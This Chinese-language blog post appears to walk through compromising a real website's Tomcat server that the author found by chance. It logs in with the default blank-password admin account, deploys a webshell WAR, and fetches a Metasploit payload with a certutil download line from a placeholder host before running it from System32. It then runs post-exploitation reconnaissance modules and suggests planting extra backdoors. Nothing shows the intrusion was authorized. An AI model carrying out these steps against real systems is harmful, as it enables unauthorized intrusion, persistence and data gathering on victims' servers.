浅析:TomCat Getshell拿服务器权限实战
0xOO前言
无意中接触到一个网站 所以索性尝试一下
没什么技术性 都是一些基本操作 大佬看看就可以了奥
注:由于保密问题 所有关于对方信息网址等各项信息都将保密打上马赛克 能打的都打上马赛克
41f4a36c979d9808d9f058dfff5ff56b.jfif
0x00
tomcat默认有个manager的管理后台app,密码存放在conf/tomcat-users.xml里面。如果tomcat是外网开放的,那么这个manager服务也是开放的,http://主机:端口/manager/html 可以看看是不是通的
0x01
b60b9237b1dd09bdcd37b217fbafda95.jfif
首先我尝试一下默认账号admin 密码为空 发现可以进去 那真是太好了
2c4d110a175472d7c0d6fd7ec1fbbf4d.jfif
登录进去之后
107f154f5f07abc3748a97cdc36486ba.jfif
可以看到有一个上传war部署项目的
909ed859bc1becf92361c7eb2f17b25c.jfif
那么就用IDEA 打包一个webshell大马 部署进去即可
首先需要一个自备的webshell大马
158ebc6cbc6281c319b1eb96149e6379.jfif
随便找一个
然后打开IDEA创建一个项目
34c403b7f19258b01f1f087945828ee4.jfif
73e3832d98a4f40c074377bff4f65c78.jfif
一直Next即可
然后把webshell拷贝到scr目录
91911732b001a021e7578617d78aaa01.jfif
选择Project Structure
626b88d8218eaf4b7cee17db7fd8733b.jfif
选择Artifacts 然后再选择web Application: Archive
b496ea2d4ad6ef760a8f3075d934587a.jfif
d340c57a0362b707f70ef23a7ee5e3a3.jfif
打勾include in project build 然后点击+号选择module Output
dcb337b626e5d0622ffdaa361df60a4a.jfif
选择项目即可
3bb582d957d1b943cede8651e95e7985.jfif
然后选择build
b03b2e0632a56b068b05b52b721e02cc.jfif
选择build Artifacts
c17d8411cca4d4de0eb68984ebf644a0.jfif
d0bcb3c4049e74bc3fb92397d0910f79.jfif
完事之后呢
上传部署即可
2521ceba26a0ceae92ec1b20a249ad41.jfif
点击Deploy之后就可以看到
62027115cd92ab66792dc5ee07cb90f5.jfif
多了一个xssx
那么访问那个目录即可
9e6ae9c0417d78f2e26268dd21bfad74.jfif
526d8140d58d2c9c552006b94e543ab0.jfif
命令执行 ipconfig
可以看到内网 192.168.0.128
Net user
bc9e995c29e501fb0e6be8c5ea1d13c3.jfif
0x02
权限移交MetaSploit(Msf)
尝试使用shellcode制作payload
aac728351ecc43f8e12ee880199abc2b.jfif
3a7974e8335c38d170044dd90f6b754c.jfif
675c875939adab70a447f9ccb91b5104.jfif
编译后利用webshell上传到服务器
有最快捷的方法把payload上传到服务器( 记得一定要内网穿透哦 )
- 第一种就是使用CMD的命令certutil(然后使用CMD命令运行即可)
命令:certutil -urlcache -split -f https://www.xxx.com/test.EXE
2.第二种就是使用webshell的上传(同理,使用CMD命令运行PAYLOAD)
b1b213b89be92f2d8bdd38be37b6b344.jfif
首先使用webshell来到服务器的C:\\Windows\\System32\\目录下,然后uploadfile
77fb32f705bd0b699327b14743ec3103.jfif
Jie.exe就是我们上传的payload
那么直接使用CMD命令运行(命令:start C:\Windows\System32\jie.exe)
997bc22198f379e2b8fd65b408bcefed.jfif
12cb557c05bcb1c193467fcc11bec00f.jfif
内网的IP为192.168.0.128
40631909ceea7b50133311648df5b6c1.jfif
0x03
信息收集
1.查看路由
dbb3080d93e669e78669920ae545b9eb.jfif
2.查看系统信息
14700b11fc20c6cfe731a2b42418da5b.jfif
3.进入CMD命令行 然后Net User查看用户
215cde3fc3956bae8cd4745b053c9dff.jfif
4.调用post/windows/gather/dumplinks 来查看最近访问的文件
c64067a5833b066e582f0f964b74f64d.jfif
5.调用post/windows/gather/enum_applications 来查看目标主机安装软件的信息
87ea03e97f5ab44db88177609faa78de.jfif
然后可以选择多放几个后门 或者 提交漏洞!
请在国庆期间做一个好人